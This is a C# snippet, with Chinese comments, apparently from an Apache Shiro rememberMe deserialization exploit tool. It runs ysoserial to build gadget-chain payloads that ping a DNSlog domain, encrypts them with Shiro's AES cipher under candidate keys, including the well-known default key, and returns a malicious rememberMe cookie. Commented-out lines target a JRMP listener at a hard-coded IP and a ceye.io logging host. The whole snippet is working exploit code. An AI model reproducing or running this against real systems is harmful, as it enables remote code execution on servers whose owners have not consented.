// 获取reMemberMe public static string get_rememberMe(string keyValue, string keyKey, string moduleValue, string moduleKey, string dnslogDomain) { // 生成一个序列化文件 payload.ser,以模块分线程并以模块名命名文件,防止冲突 Process p = new Process(); p.StartInfo.FileName = "cmd"; //p.StartInfo.Arguments = @"/c java -jar ysoserial.jar JRMPClient ""101.201.56.18:999"" > payload.ser"; //p.StartInfo.Arguments = @"/c java -jar ysoserial.jar CommonsCollections2 ""ping cc1.k2.65hos5.ceye.io"" > payload.ser"; p.StartInfo.Arguments = $@"/c java -jar ysoserial.jar {moduleValue} ""ping {moduleKey}.{keyKey}.{dnslogDomain}"" > {moduleValue}.ser"; //Console.WriteLine($"{moduleKey}.{keyKey}.{dnslogDomain}"); p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardError = true; p.StartInfo.CreateNoWindow = true; p.Start(); p.StandardOutput.ReadToEnd(); p.Dispose(); // 以字节形式读取 payload.ser byte[] textBytes = File.ReadAllBytes($@"{moduleValue}.ser"); // new一个org.apache.shiro.crypto.AesCipherService,不需要额外设置,默认就是AES/128/CBC,只需循环key爆破 AesCipherService aesCipherService = new AesCipherService(); // base64解码keyS为keyB byte[] keyB = Convert.FromBase64String(keyValue); // 调用shiro加密方法并返回byteArray byte[] encrptByte = aesCipherService.encrypt(textBytes, keyB).getBytes(); // base64编码 string encrptText = Convert.ToBase64String(encrptByte); return("rememberMe=" + encrptText); }
public static string getRememberMe(string keyS) { // 以字节形式读取 poc.ser byte[] textBytes = File.ReadAllBytes($@"poc.ser"); // new一个org.apache.shiro.crypto.AesCipherService,不需要额外设置,默认就是AES/128/CBC AesCipherService aesCipherService = new AesCipherService(); // base64解码keyS为keyB // byte[] key = Convert.FromBase64String("kPH+bIxk5D2deZiIxcaaaA=="); byte[] keyB = Convert.FromBase64String(keyS); // 调用shiro加密方法并返回byteArray byte[] encrptByte = aesCipherService.encrypt(textBytes, keyB).getBytes(); // base64编码 string encrptText = Convert.ToBase64String(encrptByte); return("rememberMe=" + encrptText); }